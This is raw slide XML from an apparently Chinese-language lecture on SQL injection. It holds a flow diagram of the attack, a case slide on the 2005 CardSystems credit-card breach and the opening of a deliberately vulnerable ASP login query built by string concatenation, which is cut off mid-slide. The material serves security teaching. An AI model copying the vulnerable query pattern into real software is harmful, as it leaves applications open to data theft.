        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="396340"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入基本流程图</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="2667000"/>
            <a:ext cx="1436687" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14341" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6234113" y="4572000"/>
            <a:ext cx="1155700" cy="1420813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1905000"/>
            <a:ext cx="2436813" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14343" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5789613" y="1524000"/>
            <a:ext cx="1723549" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害的服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5805488" y="6000750"/>
            <a:ext cx="2175596" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14345" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="617538"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14346" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="830792" y="4058792"/>
            <a:ext cx="954107" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2952347" y="2070070"/>
            <a:ext cx="1691489" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意表单</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14348" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6184901" y="3651250"/>
            <a:ext cx="1801812" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14349" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7277100" y="3482975"/>
            <a:ext cx="1257300" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非预期</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119438" y="3714750"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取有价值的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="2378075"/>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dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7207250" y="3090863"/>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a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14353" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="3733800"/>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a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2152650" y="2773363"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 1703387"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4400550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="912812"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>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609600" y="304800"/>
            <a:ext cx="8153400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>注入实例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8001000" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CardSystems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>信用卡支付处理公司</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入攻击，发生在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>导致停业</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>263,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>张信用卡 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>从数据库中获取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>信用卡信息 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>数据存储未加密</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>万信用卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>数据暴露</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7363411" y="1145628"/>
            <a:ext cx="1397000" cy="1611313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">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1849989" y="6629400"/>
            <a:ext cx="5501827" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://www.cvedetails.com/vulnerability-list/vendor_id-2337/opsqli-1/Wordpress.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B936E652-9FB9-4172-9646-4F65EA78A4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6200"/>
            <a:ext cx="9144000" cy="6615019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3581575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03554" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8686800" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的登陆页面 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(ASP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303555" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set ok = execute( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	   WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
